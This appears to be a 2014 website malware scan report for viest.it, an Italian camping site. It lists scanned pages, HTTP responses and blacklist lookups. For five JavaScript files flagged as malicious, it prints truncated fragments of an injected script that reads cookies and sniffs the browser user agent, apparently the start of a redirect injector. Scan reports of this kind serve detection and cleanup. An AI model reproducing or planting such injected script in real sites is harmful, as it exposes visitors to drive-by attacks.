Scanned pages/files
Request | Server response | Status |
http://viest.it/ | 200 OK Content-Length: 40895 Content-Type: text/html | clean |
http://viest.it/js/modernizr.foundation.js | 200 OK Content-Length: 10336 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight Antivirus reports:
| ||
http://www.simplebooking.it/search-box-script.axd?IDA=1819 | 200 OK Content-Length: 66080 Content-Type: text/javascript | clean |
http://viest.it/js/jquery.js | 200 OK Content-Length: 266266 Content-Type: application/javascript | clean |
http://viest.it/js/foundation.min.js | 200 OK Content-Length: 160076 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight Antivirus reports:
| ||
http://viest.it/js/tinynav.min.js | 200 OK Content-Length: 1881 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight b.header||e.find(":eq("+a(f+" li").index(a(f+" li."+b.active))+")").attr("selected",!0);e.change(function(){i.location.href=a(this).val()});a(f).after(e);b.label&&e.before(a("<label/>").attr("for",d).addClass("tinynav_label "+d+"_label").append(b.label))}})}})(jQuery,this,0); Antivirus reports:
| ||
http://viest.it/js/light.js | 200 OK Content-Length: 7302 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight Antivirus reports:
| ||
http://viest.it/js/app.js | 200 OK Content-Length: 5471 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight } var widthGap = (myWidth > myParentWidth) ? (myWidth - myParentWidth)/2 : (myParentWidth - myWidth)/2; var heightGap = (myHeight > myParentHeight) ? (myHeight - myParentHeight)/2 : (myParentHeight - myHeight)/2; me.css({ 'margin-top' : -heightGap, 'margin-left': -widthGap }); } } })(jQuery, this); Antivirus reports:
| ||
http://www.jscache.com/wejs?wtype=certificateOfExcellence&uniq=660&locationId=202587&lang=it&year=2013 | 200 OK Content-Length: 152 Content-Type: application/x-javascript | clean |
http://viest.it/home | 200 OK Content-Length: 40883 Content-Type: text/html | clean |
http://viest.it/camping-vicenza | 200 OK Content-Length: 41560 Content-Type: text/html | clean |
http://viest.it/vicenza_e_dintorni | 200 OK Content-Length: 36244 Content-Type: text/html | clean |
http://viest.it/contatti | 200 OK Content-Length: 43024 Content-Type: text/html | clean |
http://viest.it/dove_siamo | 200 OK Content-Length: 37372 Content-Type: text/html | clean |
http://viest.it/guestbook | 200 OK Content-Length: 37361 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: viest.it
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 14:05:30 GMT
Pragma: no-cache
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=6h66l7k27devm16bos2sb8h866; path=/
GET / HTTP/1.1
Host: viest.it
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 14:05:30 GMT
Pragma: no-cache
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=6h66l7k27devm16bos2sb8h866; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: viest.it
Referer: http://www.google.com/search?q=viest.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: viest.it
Referer: http://www.google.com/search?q=viest.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=viest.it
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://viest.it/
Result: viest.it is not infected or malware details are not published yet.
Result: viest.it is not infected or malware details are not published yet.